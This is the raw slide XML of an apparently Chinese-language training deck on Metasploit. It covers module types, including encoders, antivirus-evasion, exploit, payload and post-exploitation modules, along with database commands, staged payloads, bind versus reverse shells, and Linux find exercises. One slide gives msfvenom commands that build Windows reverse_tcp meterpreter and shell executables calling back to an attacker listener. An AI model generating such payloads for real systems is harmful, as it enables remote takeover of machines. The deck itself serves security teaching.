            <a:endParaRPr sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr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编码器获取有效负载的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>原始字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>并运行某种编码算法，如按位 XOR。这些模块可用于对错误字符（如空字节）进行编码。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免杀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914890" cy="1678940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>Evasion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>免杀模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr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使用户能够生成旨在规避防病毒软件（如 Windows Defender）的规避有效负载，而无需安装外部工具。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利用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914890" cy="167894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sz="2000" b="1"/>
              <a:t>Exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-2420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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漏洞利用模块用于以允许框架执行任意代码的方式利用漏洞。执行的任意代码称为有效负载。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-find-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习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基于所有者和组查找文件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查找基于用户的单个文件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/ -user root -name test.c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查找基于用户的所有文件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~ -user neil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查找基于组的所有文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     find /home -group developer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查找用户的特定文件   find ~ -user neil -iname "*.c"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
              <a:solidFill>
                <a:srgbClr val="202122"/>
              </a:solidFill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空指令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914890" cy="167894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sz="2000" b="1"/>
              <a:t>Nop-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>空指令</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-11</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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Nop 模块是“No Operation”的缩写，可生成一系列“No Operation”指令，这些指令不会产生任何副作用。NOP 通常与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆栈缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>结合使用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载荷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914890" cy="167894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sz="2000" b="1"/>
              <a:t>Payload-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>载荷</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-1468</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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在 Metasploit 漏洞利用模块的上下文中，载荷模块封装了作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞利用成功结果而执行的任意代码 （shellcode）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>。这通常涉及创建 Metasploit 会话，但可能会执行代码，例如添加用户帐户，或执行简单的 pingback 命令来验证代码执行是否成功针对易受攻击的目标。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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>后渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>模块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87475"/>
            <a:ext cx="9914890" cy="167894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sz="2000" b="1"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>ost-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>载荷</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>模块</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>-423</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p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这些模块在计算机遭到入侵并打开 Metasploit 会话后很有用。它们执行有用的任务，例如从会话中收集、收集或枚举数据。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07465"/>
            <a:ext cx="9914890" cy="525081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/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>支持连接到数据库，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>并不强制使用数据库，没有数据库也可以完美运行。然而， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>许多功能都需要数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" fontAlgn="auto"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>需要连接数据库的 Metasploit 功能包括：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记录通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db_nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令通过 nmap 扫描找到的网络上的其他计算机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>并存储为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>”。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可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令查看主机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存储通过漏洞成功提取的凭据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>并存储为“creds”。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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令查看凭证。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跟踪成功的利用尝试被记录为“漏洞”。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可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令查看成功的漏洞利用。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vulns命令还跟踪不成功的利用尝试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db_nmap在远程主机上检测到的服务存储记录为“Services”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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令查看远程服务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跟踪利用有效负载打开的多个远程会话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可以使用sessions命令来管理和跟踪这些会话。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将成功利用返回的任何难以定义的信息存储为“Loot”(战利品)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可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令查看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跟踪“Ping back 有效负载”，这是一种非交互式有效负载类型，可为用户提供目标上远程执行的确认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通过由活动会话组成的“路由”网络进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>中转</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>routes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令查看</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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600"/>
              <a:t>构建包含上述所有信息的报告（仅限专业用户）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree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数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>初始化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98140" y="1307465"/>
            <a:ext cx="4220845" cy="570865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>  init  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>第一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>运行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978025"/>
            <a:ext cx="7981950" cy="1714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1825" y="4062095"/>
            <a:ext cx="4220845" cy="57086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/>
              <a:t>db_status   //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>中查看数据库连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>状态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" y="4889500"/>
            <a:ext cx="4578350" cy="381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1560195"/>
            <a:ext cx="5391150" cy="50482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数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扫描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07465"/>
            <a:ext cx="4220845" cy="57086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sz="1600"/>
              <a:t>db_nmap -sT -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>p-  xxxx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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2334260"/>
            <a:ext cx="6000750" cy="26098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内联</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>选项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07465"/>
            <a:ext cx="7336790" cy="45402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600"/>
              <a:t>2021 年，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>添加了对运行模块和同时指定模块选项的支持，称为内联选项支持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1835150"/>
            <a:ext cx="10172700" cy="318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5059680"/>
            <a:ext cx="3640455" cy="17208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模块信息详细信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看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07465"/>
            <a:ext cx="11115040" cy="129222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/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>进入到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>控制台</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>选定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t> info -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>生成详细信息文档，包含文档拉取请求，在这里可以</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>找到几乎所有您需要了解的有关该模块的信息，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>                               //</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>以及可能无法通过阅读模块的描述或一些随机博客文章学到的东西。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这些信息真的就像黄金一样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr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2981960"/>
            <a:ext cx="6115685" cy="279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5938520"/>
            <a:ext cx="10858500" cy="4953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msf-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>载荷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825" y="1307465"/>
            <a:ext cx="11115040" cy="5118100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>有效负载模块存储在 modules/payloads/{singles,stages,stagers}/&lt;platform&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>分阶段(Staged)有效负载： &lt;platform&gt;/[arch]/&lt;stage&gt;/&lt;stager&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>有效负载 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>windows/x64/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>来说</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>，平台是windows ，架构是x64 ，提供的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>final stage</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>是meterpreter ，而提供它的 stager 是reverse_tcp。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>Stagers﻿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>的作用是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>创建某种形式的通信</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t> ，然后将执行传递到下一个阶段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>使用 stager 可以解决两个问题。 首先，它允许我们</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最初使用较小的有效负载来加载具有更多功能的较大有效负载</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t> 。其次，它可以</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将通信机制与最终阶段分开</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t> ，因此一个有效负载可以与多种传输一起使用，而无需重复代码。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>Stages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>由于 stager 将</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过分配大块内存</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>供我们运行来处理任何大小限制，因此</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t> 可以任意大。其优点之一是能够用 C 等高级语言编写最终阶段的有效负载。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>所有分阶段的有效负载只不过是建立通信并执行下一阶段的小存根。当您使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>分阶段的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>有效负载创建可执行文件时， 您</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>实际上只是在创建stager</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="1600"/>
              <a:t>下面三条命令将创建功能相同的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>的文件：</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1600"/>
              <a:t>msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>载荷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540" y="1283970"/>
            <a:ext cx="8851265" cy="767715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在 shell stage的情况下，当与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t>交互时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t>会</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将远程进程的 stdio</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t> 连接到您的终端。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在Meterpreter stage的情况下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="0" i="0"/>
              <a:t>将开始使用 Meterpreter 有线协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="19191C"/>
                </a:solidFill>
                <a:latin typeface="JetBrains Sans Bundled"/>
                <a:ea typeface="JetBrains Sans Bundled"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="19191C"/>
              </a:solidFill>
              <a:latin typeface="JetBrains Sans Bundled"/>
              <a:ea typeface="JetBrains Sans Bundled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7765" y="2587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2400300"/>
            <a:ext cx="10033000" cy="102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3820160"/>
            <a:ext cx="10591800" cy="24447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-find-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>练习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根据日期和时间查找文件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查找最近50天修改的文件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 /  -ctime 50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查找最近50天访问的文件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/ -atime 50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查找最后50-100天修改内容的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     find / -mtime +50 -mtime -100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查找在过去1小时内更改的文件   find / -cmin -60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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>与反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell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1825" y="1283970"/>
            <a:ext cx="8851265" cy="1373505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正向shell-bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="19191C"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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在目标计算机上打开一个新服务，并要求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者连接到它</a:t>
            </a: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以获得会话</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="19191C"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs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反向shell-reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="19191C"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1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要求攻击者首先在他的机器上设置一个侦听器， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目标计算机充当连接到该侦听器的客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="19191C"/>
                </a:solidFill>
